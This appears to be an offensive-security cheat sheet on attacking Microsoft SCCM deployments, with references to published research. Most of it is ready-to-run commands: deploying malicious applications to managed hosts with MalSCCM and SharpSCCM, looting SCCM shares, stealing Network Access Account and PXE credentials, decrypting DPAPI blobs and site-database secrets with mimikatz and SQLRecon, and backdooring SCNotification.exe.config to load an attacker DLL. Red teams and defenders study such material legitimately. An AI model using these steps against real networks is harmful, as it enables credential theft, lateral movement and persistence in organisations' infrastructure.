Deployment - SCCM

SCCM is a solution from Microsoft to enhance administration in a scalable way across an organisation.

SCCM Application Deployment

• PowerShellMafia/PowerSCCM - PowerShell module to interact with SCCM deployments

• nettitude/MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage

• Using SharpSCCM

  .\SharpSCCM.exe get devices --server <SERVER8NAME> --site-code <SITE_CODE>
  .\SharpSCCM.exe <server> <sitecode> exec -d <device_name> -r <relay_server_ip>
  .\SharpSCCM.exe exec -d WS01 -p "C:\Windows\System32\ping 10.10.10.10" -s --debug
  

• Compromise client, use locate to find management server

  MalSCCM.exe locate
  

• Enumerate over WMI as an administrator of the Distribution Point

  MalSCCM.exe inspect /server:<DistributionPoint Server FQDN> /groups
  

• Compromise management server, use locate to find primary server
• Use inspect on primary server to view who you can target

  MalSCCM.exe inspect /all
  MalSCCM.exe inspect /computers
  MalSCCM.exe inspect /primaryusers
  MalSCCM.exe inspect /groups
  

• Create a new device group for the machines you want to laterally move too

  MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device
  MalSCCM.exe inspect /groups
  

• Add your targets into the new group

  MalSCCM.exe group /addhost /groupname:TargetGroup /host:WIN2016-SQL
  

• Create an application pointing to a malicious EXE on a world readable share : SCCMContentLib$

  MalSCCM.exe app /create /name:demoapp /uncpath:"\\BLORE-SCCM\SCCMContentLib$\localthread.exe"
  MalSCCM.exe inspect /applications
  

• Deploy the application to the target group

  MalSCCM.exe app /deploy /name:demoapp /groupname:TargetGroup /assignmentname:demodeployment
  MalSCCM.exe inspect /deployments
  

• Force the target group to checkin for updates

  MalSCCM.exe checkin /groupname:TargetGroup
  

• Cleanup the application, deployment and group

  MalSCCM.exe app /cleanup /name:demoapp
  MalSCCM.exe group /delete /groupname:TargetGroup
  

SCCM Shares

Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares

• 1njected/CMLoot

  Invoke-CMLootInventory -SCCMHost sccm01.domain.local -Outfile sccmfiles.txt
  Invoke-CMLootDownload -SingleFile \\sccm\SCCMContentLib$\DataLib\SC100001.1\x86\MigApp.xml
  Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -Extension msi
  

SCCM Configuration Manager

• subat0mik/Misconfiguration-Manager/MisconfigurationManager.ps1

CRED-1 Retrieve credentials via PXE boot media

• Misconfiguration-Manager - CRED-1

Requirements:

• On the SCCM Distribution Point: HKLM\Software\Microsoft\SMS\DP\PxeInstalled = 1
• On the SCCM Distribution Point: HKLM\Software\Microsoft\SMS\DP\IsPxe = 1
• PXE-enabled distribution point

Exploitation:

• csandker/pxethiefy

  sudo python3 pxethiefy.py explore -i eth0
  

• MWR-CyberSec/PXEThief

CRED-2 Request a policy containing credentials

• Misconfiguration-Manager - CRED-2

Requirements:

• PKI certificates are not required for client authentication
• Domain accounts credential

Exploitation:

Create a machine or compromise an existing one, then request policies such as NAAConfig

SharpSCCM get secrets -u <username-machine-$> -p <password>
SharpSCCM get naa

CRED-3 Extract currently deployed credentials stored as DPAPI blobs

Dump currently deployed secrets via WMI. If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials.

• Misconfiguration-Manager - CRED-3

Requirements:

• Local administrator privileges on an SCCM client

Exploitation:

• Find SCCM blob

  Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"
  NetworkAccessPassword : <![CDATA[E600000001...8C6B5]]>
  NetworkAccessUsername : <![CDATA[E600000001...00F92]]>
  

• Using GhostPack/SharpDPAPI

  $str = "060...F2DAF"
  $bytes = for($i=0; $i -lt $str.Length; $i++) {[byte]::Parse($str.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber); $i++}
  $b64 = [Convert]::ToBase64String($bytes[4..$bytes.Length])
  .\SharpDPAPI.exe blob /target:$b64 /mkfile:masterkeys.txt    
  

• Using Mayyhem/SharpSCCM for SCCM retrieval and decryption

  .\SharpSCCM.exe local secrets -m wmi
  

From a remote machine.

• Using garrettfoster13/sccmhunter

  python3 ./sccmhunter.py http -u "administrator" -p "P@ssw0rd" -d internal.lab -dc-ip 10.10.10.10. -auto
  

CRED-4 Extract legacy credentials stored as DPAPI blobs

• Misconfiguration-Manager - CRED-4

Requirements:

• Local administrator privileges on an SCCM client

Exploitation:

• Search the database using SharpDPAPI

  .\SharpDPAPI.exe search /type:file /path:C:\Windows\System32\wbem\Repository\OBJECTS.DATA
  

• Search the database using SharpSCCM

  .\SharpSCCM.exe local secrets -m disk
  

• Check ACL for the CIM repository located at C:\Windows\System32\wbem\Repository\OBJECTS.DATA:

  Get-Acl C:\Windows\System32\wbem\Repository\OBJECTS.DATA | Format-List -Property PSPath,sddl
  ConvertFrom-SddlString ""
  

CRED-5 Extract the SC_UserAccount table from the site database

• Misconfiguration-Manager - CRED-5

Requirements:

• Site database access
• Primary site server access
  • Access to the private key used for encryption

Exploitation:

• gentilkiwi/mimikatz

  mimikatz # misc::sccm /connectionstring:"DRIVER={SQL Server};Trusted=true;DATABASE=ConfigMgr_CHQ;SERVER=CM1;"
  

• skahwah/SQLRecon, only if the site server and database are hosted on the same system

  SQLRecon.exe /auth:WinToken /host:CM1 /database:ConfigMgr_CHQ /module:sDecryptCredentials
  

• SQLRecon + xpn/sccmdecryptpoc.cs

  SQLRecon.exe /auth:WinToken /host:<SITE-DB> /database:CM_<SITECODE> /module:query /command:"SELECT * FROM SC_UserAccount"
  sccmdecryptpoc.exe 0C010000080[...]5D6F0
  

SCCM Persistence

• mandiant/CcmPwn - lateral movement script that leverages the CcmExec service to remotely hijack user sessions.

CcmExec is a service native to SCCM Windows clients that is executed on every interactive session. This technique requires Adminsitrator privileges on the targeted machine.

• Backdoor the SCNotification.exe.config to load your DLL

  python3 ccmpwn.py domain/user:password@workstation.domain.local exec -dll evil.dll -config exploit.config
  

• Malicious config to force SCNotification.exe to load a file from an attacker-controlled file share

  python3 ccmpwn.py domain/user:password@workstation.domain.local coerce -computer 10.10.10.10
  

References

• Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015
• The Phantom Credentials of SCCM: Why the NAA Won’t Die - Duane Michael - Jun 28
• Introducing MalSCCM - Phil Keeble -May 4, 2022
• Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022
• Exploring SCCM by Unobfuscating Network Access Accounts - @xpn - Posted on 2022-07-09
• Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022
• Misconfiguration Manager: Overlooked and Overprivileged - Duane Michael - Mar 5, 2024
• SeeSeeYouExec: Windows Session Hijacking via CcmExec - Andrew Oliveau
• SCCM / MECM LAB - Part 0x0 - mayfly - Mar 23, 2024
• SCCM / MECM LAB - Part 0x1 - Recon and PXE - mayfly - Mar 28, 2024
• SCCM / MECM LAB - Part 0x2 - Low user - mayfly - Mar 28, 2024
• SCCM / MECM LAB - Part 0x3 - Admin User - mayfly - Apr 3, 2024

Share this content